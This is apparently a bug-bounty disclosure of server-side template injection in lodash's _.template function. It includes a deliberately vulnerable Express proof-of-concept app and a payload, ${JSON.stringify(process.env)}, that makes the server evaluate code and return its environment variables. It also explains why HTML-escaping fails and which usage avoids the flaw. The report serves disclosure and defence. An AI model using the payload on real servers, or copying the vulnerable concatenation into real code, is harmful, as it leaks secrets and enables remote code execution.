
Jun 22, 2020 - 6:16 a.m.

Node.js third-party modules: Server-side Template Injection in lodash.js


I would like to report a Server-side Template Injection in lodash.js (the _.template function). It allows the execution of code on the server.


module name: lodash
version: 4.17.15
npm page:

Module Description

The Lodash library exported as Node.js modules.

Module Stats

26,664,631 weekly downloads


Vulnerability Description

The _.template function of the lodash package does not validate or sandbox the template string it is given: it compiles that string into a JavaScript function. Text between the interpolate delimiters (`${...}` by default, or `<%= ... %>`) and the evaluate delimiters (`<% ... %>`) is emitted as JavaScript source and runs with the full privileges of the Node.js process when the compiled template is called.

An application making use of the lodash package may be exploited by an attacker who controls any value that is concatenated into the string passed to _.template, because the compiler cannot distinguish template markup written by the developer from markup that arrived in user input. An attacker can inject a JavaScript expression inside the interpolate delimiters, for example parameter=${JSON.stringify(process.env)}, and the server evaluates it and embeds the result in the response. Note that HTML-escaping the input before concatenation does not prevent this: escape-html only rewrites the characters &, <, >, " and ', so `<%= ... %>` is neutralised but `${...}` passes through intact. The safe pattern is to keep the template string constant and pass untrusted values only as properties of the data object the compiled function receives; in that position they are printed, not evaluated.

Steps To Reproduce:

Step 1: Create a test application that requires the lodash.js library. The application below accepts user-supplied input in the ‘name’ parameter and concatenates it into the string handled by the lodash _.template function:

const express = require('express');
const _ = require('lodash');
const escapeHTML = require('escape-html');
const app = express();

app.get('/', (req, res) => {
  res.set('Content-Type', 'text/html');
  // User-controlled value. The original line was truncated in the report;
  // reading it from the 'name' query parameter is assumed here.
  const name = req.query.name;
  // Create a template from user input: the template *source* now contains
  // attacker-supplied text, so any ${...} in it is compiled as JavaScript.
  // escapeHTML() does not touch '$', '{' or '}' and so does not help.
  const compiled = _.template("Hello " + escapeHTML(name) + ".");
  res.send(compiled());
});

app.listen(8000, () => {
  console.log('POC app listening on port 8000!');
});

Step 2: Visit the vulnerable application at

Step 3: Enter a payload such as ${JSON.stringify(process.env)} into the name query parameter. The compiled template evaluates the expression on the server and the response contains the serialized environment variables of the Node.js process.

Supporting Material/References:

  • OSX 10.15.5
  • Node.js v10.16.0
  • npm v6.9.0

Wrap up

  • I contacted the maintainer to let them know: [Y/N] N
  • I opened an issue in the related repository: [Y/N] N

> Hunter’s comments and funny memes go here

Apologies if I haven’t used the ideal terminology or if this is a duplicate.


Remote code execution